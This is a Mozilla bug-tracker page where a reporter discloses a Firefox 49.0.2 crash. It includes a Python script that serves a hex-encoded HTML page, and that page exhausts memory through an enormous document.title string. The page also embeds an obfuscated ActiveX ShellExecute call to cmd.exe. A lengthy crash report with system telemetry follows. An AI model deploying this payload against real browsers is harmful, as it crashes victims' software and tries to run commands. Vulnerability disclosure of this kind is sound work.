Open
Bug 1314862
Opened 9 years ago
Updated 3 years ago
Mozilla Firefox 49.0.2 - crash-buffer some tools
Categories
(Core :: DOM: Core & HTML, defect, P3)
Tracking
()
NEW
People
(Reporter: sultanalbalawi00, Unassigned)
Details
(Keywords: crash, csectype-oom, testcase, Whiteboard: [sg:dos])
Crash Data
Attachments
(2 files)
firefoxbl.png
Hello
This new security bug in the latest version
#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working with tor browser you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65'
ban+='\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
i+=1
ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
def __init__(self,host,port):
ipadd=(host,port)
HTTPServer.__init__(self,ipadd,Req)
def createfile():
global filecreate
filecreate = "test.html"
open(filecreate, "wb").write(htmlcrach)
print ('file done: {}').format(filecreate)
def start():
global filecreate
ser=runHTTP(host,port)
print "http://{}:{}/{}".format(host,port,filecreate)
ser.serve_forever()
createfile()
start()
|
Reporter | |
Comment 1•9 years ago
|
||
AdapterDeviceID: 0x0412
AdapterDriverVersion: 10.18.10.3412
AdapterSubsysID: 05a41028
AdapterVendorID: 0x8086
Add-ons: %7B8f8fe09b-0bd3-4470-bc1b-8cad42b8203b%7D:0.17.1-signed,%7BF5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4%7D:1.6.3.1-signed.1-signed,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:49.0.2,heartbleed%40dactyl.googlecode.com:0.1.1.1-signed.1-signed,jid1-eMhaOaq3SPBFDg%40jetpack:0.2.1.1-signed.1-signed,HiddenUIElements%40LukaszPolowczyk:1.0.8,%7B1018e4d6-728f-4b20-ad56-37578a4de76b%7D:5.1.16,asyncrendering%40mozilla.org:2.0,e10srollout%40mozilla.org:1.3,firefox%40getpocket.com:1.0.4,webcompat%40mozilla.org:1.0
AddonsShouldHaveBlockedE10s: 1
AvailablePageFile: 57130303488
AvailablePhysicalMemory: 25107955712
AvailableVirtualMemory: 2163433472
BIOS_Manufacturer: Dell Inc.
BlockedDllList:
BreakpadReserveAddress: 46596096
BreakpadReserveSize: 67108864
BuildID: 20161019084923
CrashTime: 1478144769
E10SCohort: disqualified-test
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1477132917
MozCrashReason: MOZ_CRASH()
Notes: AdapterVendorID: 0x8086, AdapterDeviceID: 0x0412, AdapterSubsysID: 05a41028, AdapterDriverVersion: 10.18.10.3412
FP(D000-L10010-W00000000-T0000) D2D1.1? DWrite? DWrite+ D2D1.1+ D3D11 Layers? D3D11 Layers+
ProductID: {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
ProductName: Firefox
ReleaseChannel: release
SafeMode: 0
SecondsSinceLastCrash: 16
StartupTime: 1478144760
SystemMemoryUsePercentage: 26
TelemetryEnvironment: {"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86","buildId":"20161019084923","version":"49.0.2","vendor":"Mozilla","platformVersion":"49.0.2","xpcomAbi":"x86-msvc","hotfixVersion":"20160826.01"},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":32676,"virtualMaxMB":4096,"cpu":{"count":8,"cores":4,"vendor":"GenuineIntel","family":6,"model":60,"stepping":3,"l2cacheKB":256,"l3cacheKB":8192,"speedMHz":3591,"extensions":["hasMMX","hasSSE","hasSSE2","hasSSE3","hasSSSE3","hasSSE4_1","hasSSE4_2","hasAVX","hasAVX2"]},"os":{"name":"Windows_NT","version":"6.1","locale":"ar-SA","servicePackMajor":1,"servicePackMinor":0,"installYear":2015},"hdd":{"profile":{"model":"ST500DM002-1BD142","revision":"KC48"},"binary":{"model":"ST500DM002-1BD142","revision":"KC48"},"system":{"model":"ST500DM002-1BD142","revision":"KC48"}},"gfx":{"D2DEnabled":true,"DWriteEnabled":true,"adapters":[{"description":"Intel(R) HD Graphics 4600","vendorID":"0x8086","deviceID":"0x0412","subsysID":"05a41028","RAM":null,"driver":"igdumdim64 igd10iumd64 igd10iumd64 igdumdim32 igd10iumd32 igd10iumd32","driverVersion":"10.18.10.3412","driverDate":"1-29-2014","GPUActive":true}],"monitors":[{"screenWidth":1920,"screenHeight":1080,"refreshRate":60,"pseudoDisplay":false}],"features":{"compositor":"d3d11","d3d11":{"status":"available","version":45056,"warp":false,"textureSharing":true,"blacklisted":false},"d2d":{"status":"available","version":"1.1"}}},"isWow64":true},"settings":{"blocklistEnabled":true,"e10sEnabled":false,"e10sCohort":"disqualified-test","telemetryEnabled":false,"locale":"en-US","update":{"channel":"release","enabled":true,"autoDownload":true},"userPrefs":{"browser.cache.disk.capacity":358400,"browser.newtab.url":"<user-set>","browser.newtabpage.enhanced":true},"addonCompatibilityCheckEnabled":true,"isDefaultBrowser":true},"profile":{"creationDate":17016},"addons":{"activeAddons":{"heartbleed@dactyl.googlecode.com":{"blocklisted":false,"description":"Notify of heartbleed vulnerabilities","name":"Heartbleed Notifier","userDisabled":false,"appDisabled":false,"version":"0.1.1.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17032,"updateDay":17032,"signedState":2,"isSystem":false},"jid1-eMhaOaq3SPBFDg@jetpack":{"blocklisted":false,"description":"A Firefox add-on to notify you when you visit a webpage vulnerable to Heartbleed","name":"Heartbleed Monitor","userDisabled":false,"appDisabled":false,"version":"0.2.1.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17032,"updateDay":17032,"signedState":2,"isSystem":false},"{8f8fe09b-0bd3-4470-bc1b-8cad42b8203b}":{"blocklisted":false,"description":"View HTTP headers of a page and while browsing.","name":"Live HTTP headers(Fixed By Danyial.com)","userDisabled":false,"appDisabled":false,"version":"0.17.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17036,"updateDay":17036,"signedState":1,"isSystem":false},"{F5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4}":{"blocklisted":false,"description":"A toolbar that helps you find and test SQL injections","name":"HackBar","userDisabled":false,"appDisabled":false,"version":"1.6.3.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17077,"updateDay":17077,"signedState":2,"isSystem":false},"HiddenUIElements@LukaszPolowczyk":{"blocklisted":false,"description":"Options removing not removable browser UI elements.","name":"Hidden UI Elements","userDisabled":false,"appDisabled":false,"version":"1.0.8","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17078,"updateDay":17078,"signedState":2,"isSystem":false},"{1018e4d6-728f-4b20-ad56-37578a4de76b}":{"blocklisted":false,"description":"Displays a flag depicting the location of the current server","name":"Flagfox","userDisabled":false,"appDisabled":false,"version":"5.1.16","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17031,"updateDay":17086,"signedState":2,"isSystem":false},"e10srollout@mozilla.org":{"blocklisted":false,"description":"Staged rollout of Firefox multi-process feature.","name":"Multi-process staged rollout","userDisabled":false,"appDisabled":false,"version":"1.3","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"firefox@getpocket.com":{"blocklisted":false,"description":"When you find something you want to view later, put it in Pocket.","name":"Pocket","userDisabled":false,"appDisabled":false,"version":"1.0.4","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"webcompat@mozilla.org":{"blocklisted":false,"description":"Urgent post-release fixes for web compatibility.","name":"Web Compat","userDisabled":false,"appDisabled":false,"version":"1.0","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"asyncrendering@mozilla.org":{"blocklisted":false,"description":"Enables asynchronous drawing mode for plugins.","name":"Asynchronous Plugin Rendering","userDisabled":false,"appDisabled":false,"version":"2.0","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17101,"updateDay":17101,"signedState":3,"isSystem":true}},"theme":{"id":"{972ce4c6-7e08-4474-a285-3208198ce6fd}","blocklisted":false,"description":"The default theme.","name":"Default","userDisabled":false,"appDisabled":false,"version":"49.0.2","scope":4,"foreignInstall":false,"hasBinaryComponents":false,"installDay":16956,"updateDay":17095},"activePlugins":[{"name":"Adobe Acrobat","version":"8.1.0.137","description":"Adobe PDF Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.adobe.x-mars","application/vnd.fdf","application/vnd.adobe.xfdf","application/vnd.adobe.xdp+xml","application/vnd.adobe.xfd+xml"],"updateDay":13643},{"name":"VLC Web Plugin","version":"2.2.4.0","description":"VLC media player Web Plugin","blocklisted":false,"disabled":false,"clicktoplay":false,"mimeTypes":["audio/mp1","audio/mp2","audio/mp3","audio/mpeg","audio/mpg","audio/x-mp1","audio/x-mp2","audio/x-mp3","audio/x-mpeg","audio/x-mpg","video/mpeg","video/x-mpeg","video/mp2t","video/mpeg-system","video/x-mpeg-system","video/x-mpeg2","audio/aac","audio/x-aac","audio/mp4","audio/x-m4a","audio/m4a","video/mp4","application/mpeg4-iod","application/mpeg4-muxcodetable","application/x-extension-m4a","application/x-extension-mp4","video/x-m4v","video/mp4v-es","audio/x-pn-windows-acm","video/divx","video/msvideo","video/vnd.divx","video/x-avi","video/x-msvideo","application/ogg","video/ogg","audio/ogg","application/x-ogg","video/x-ogm+ogg","video/x-theora+ogg","video/x-theora","audio/x-vorbis+ogg","audio/x-vorbis","audio/x-speex","audio/ogg;codecs=opus","audio/opus","application/x-vlc-plugin","audio/x-ms-asf","audio/x-ms-asx","audio/x-ms-wax","video/x-ms-asf","video/x-ms-asf-plugin","video/x-ms-asx","video/x-ms-asf-plugin","video/x-ms-asf","application/x-mplayer2","video/x-ms-wm","video/x-ms-wmv","video/x-ms-wmx","video/x-ms-wvx","audio/x-ms-wma","application/x-google-vlc-plugin","audio/wav","audio/x-wav","audio/x-pn-wav","audio/x-pn-au","video/3gp","audio/3gpp","video/3gpp","audio/3gpp2","video/3gpp2","video/fli","video/flv","video/x-flc","video/x-fli","video/x-flv","application/x-matroska","video/x-matroska","audio/x-matroska","application/xspf+xml","audio/mpegurl","audio/x-mpegurl","audio/scpls","audio/x-scpls","text/google-video-pointer","text/x-google-video-pointer","video/vnd.mpegurl","application/vnd.apple.mpegurl","application/vnd.ms-asf","application/vnd.ms-wpl","application/sdp","audio/dv","video/dv","audio/x-aiff","audio/x-pn-aiff","video/x-anim","video/webm","audio/webm","application/ram","application/vnd.rn-realmedia-vbr","application/vnd.rn-realmedia","audio/vnd.rn-realaudio","audio/x-pn-realaudio-plugin","audio/x-pn-realaudio","audio/x-real-audio","audio/x-realaudio","video/vnd.rn-realvideo","audio/amr-wb","audio/amr","audio/amr-wb","audio/amr","application/x-flac","audio/x-flac","audio/flac","application/x-flash-video","application/x-shockwave-flash","audio/ac3","audio/eac3","audio/basic","audio/midi","audio/vnd.dts.hd","audio/vnd.dolby.heaac.1","audio/vnd.dolby.heaac.2","audio/vnd.dolby.mlp","audio/vnd.dts","audio/x-ape","audio/x-gsm","audio/x-musepack","audio/x-shorten","audio/x-tta","audio/x-wavpack","audio/x-it","audio/x-mod","audio/x-s3m","audio/x-xm","application/mxf","image/vnd.rn-realpix","misc/ultravox","video/x-nsv"],"updateDay":16953},{"name":"Google Update","version":"1.3.31.5","description":"Google Update","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/x-vnd.google.update3webcontrol.3","application/x-vnd.google.oneclickctrl.9"],"updateDay":17010},{"name":"应用宝一键安装插件","version":"2.0.201.3198","description":"QQPhoneManager Onekey-Install plug-in for Android Phones","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/qqphonemanagerplugin"],"updateDay":16220},{"name":"Java(TM) Platform SE 8 U71","version":"11.71.2.15","description":"Next Generation Java Plug-in 11.71.2 for Mozilla browsers","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/x-java-applet","application/x-java-bean","application/x-java-vm","application/x-java-applet;version=1.1.1","application/x-java-bean;version=1.1.1","application/x-java-applet;version=1.1","application/x-java-bean;version=1.1","application/x-java-applet;version=1.2","application/x-java-bean;version=1.2","application/x-java-applet;version=1.1.3","application/x-java-bean;version=1.1.3","application/x-java-applet;version=1.1.2","application/x-java-bean;version=1.1.2","application/x-java-applet;version=1.3","application/x-java-bean;version=1.3","application/x-java-applet;version=1.2.2","application/x-java-bean;version=1.2.2","application/x-java-applet;version=1.2.1","application/x-java-bean;version=1.2.1","application/x-java-applet;version=1.3.1","application/x-java-bean;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-bean;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-bean;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-bean;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-bean;version=1.5","application/x-java-applet;version=1.6","application/x-java-bean;version=1.6","application/x-java-applet;version=1.7","application/x-java-bean;version=1.7","application/x-java-applet;version=1.8","application/x-java-bean;version=1.8","application/x-java-applet;jpi-version=1.8.0_71","application/x-java-bean;jpi-version=1.8.0_71","application/x-java-vm-npruntime","application/x-java-applet;deploy=11.71.2","application/x-java-applet;javafx=8.0.71"],"updateDay":16830},{"name":"Java Deployment Toolkit 8.0.710.15","version":"11.71.2.15","description":"NPRuntime Script Plug-in Library for Java(TM) Deploy","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/java-deployment-toolkit"],"updateDay":16830},{"name":"Foxit PhantomPDF Plugin for Mozilla","version":"2.2.5.1228","description":"Foxit PhantomPDF Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.fdf","application/vnd.ppdf"],"updateDay":16798},{"name":"Shockwave Flash","version":"23.0.0.205","description":"Shockwave Flash 23.0 r0","blocklisted":false,"disabled":false,"clicktoplay":false,"mimeTypes":["application/x-shockwave-flash","application/futuresplash"],"updateDay":17101},{"name":"Foxit Reader Plugin for Mozilla","version":"2.2.5.107","description":"Foxit Reader Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.fdf","application/vnd.ppdf"],"updateDay":16477}],"activeGMPlugins":{"gmp-gmpopenh264":{"version":"1.6","userDisabled":false,"applyBackgroundUpdates":1},"gmp-eme-adobe":{"version":"17","userDisabled":false,"applyBackgroundUpdates":1},"gmp-widevinecdm":{"version":"1.4.8.903","userDisabled":false,"applyBackgroundUpdates":1}},"activeExperiment":{},"persona":null}}
Theme: classic/1.0
Throttleable: 1
TotalPageFile: 68524994560
TotalPhysicalMemory: 34263449600
TotalVirtualMemory: 4294836224
URL: http://192.168.88.253:8080/test.html
UptimeTS: 31.785503777
User32BeforeBlocklist: 1
Vendor: Mozilla
Version: 49.0.2
Winsock_LSP: MSAFD Tcpip [TCP/IP] : 2 : 2 : 1 : 6 : 0x20066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
MSAFD Tcpip [UDP/IP] : 2 : 2 : 2 : 17 : 0x20609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
MSAFD Tcpip [RAW/IP] : 2 : 2 : 3 : 0 : 0x20609 : 0xc : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
MSAFD Tcpip [TCP/IPv6] : 2 : 23 : 1 : 6 : 0x20066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
MSAFD Tcpip [UDP/IPv6] : 2 : 23 : 2 : 17 : 0x20609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
MSAFD Tcpip [RAW/IPv6] : 2 : 23 : 3 : 0 : 0x20609 : 0xc : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
موفر خدمة RSVP TCPv6 : 2 : 23 : 1 : 6 : 0x22066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
موفر خدمة RSVP TCP : 2 : 2 : 1 : 6 : 0x22066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
موفر خدمة RSVP UDPv6 : 2 : 23 : 2 : 17 : 0x22609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
موفر خدمة RSVP UDP : 2 : 2 : 2 : 17 : 0x22609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
vSockets DGRAM : 0 : 28 : 2 : 0 : 0x9 : 0x8 : %windir%\system32\vsocklib.dll : : 570adc4b-67b2-42ce-92b2-acd33d88d842
vSockets STREAM : 0 : 28 : 1 : 0 : 0x26 : 0x8 : %windir%\system32\vsocklib.dll : : 570adc4b-67b2-42ce-92b2-acd33d88d842
useragent_locale: en-US
This report also contains technical information about the state of the application when it crashed.
|
|
Reporter | |
Updated•9 years ago
|
OS: All → Windows 7
Version: unspecified → 49 Branch
|
|
Reporter | |
Comment 2•9 years ago
|
||
plugin container for firefox Buffer Overflow
|
|
Reporter | |
Updated•9 years ago
|
OS: Windows 7 → All
|
|
Reporter | |
Updated•9 years ago
|
